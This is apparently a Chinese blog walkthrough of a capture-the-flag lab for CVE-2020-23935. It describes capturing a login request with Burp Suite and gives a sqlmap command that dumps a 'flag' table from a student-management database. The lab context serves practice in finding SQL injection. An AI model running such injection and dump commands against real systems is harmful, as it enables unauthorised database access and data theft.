欢迎光临
我们一直在努力

春秋云境CVE-2020-23935

1.进入靶场,

这里提供点渗透测试的思路

找文件上传的地方,找搜索的地方测sql/xss,找登入后台,尝试页面报错看框架等等

这里我们点击get started

后续进入登入界面

然后随机输入参数

bp抓包

把刚刚抓包的端口改为443

最后直接SQLmap跑起来

命令如下:

sqlmap.py -r "C:\\Users\\11548\\Desktop\\新建 文本文档.txt" –batch -D db_studentmanagement -T flag –dump

想省功夫的小伙伴们可以直接窃取我的爆库和爆表的步骤了

直接dump即可

文章到此结束了,感谢你的观看

赞(0)
未经允许不得转载:171主机测评 » 春秋云境CVE-2020-23935
分享到: 更多 (0)

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址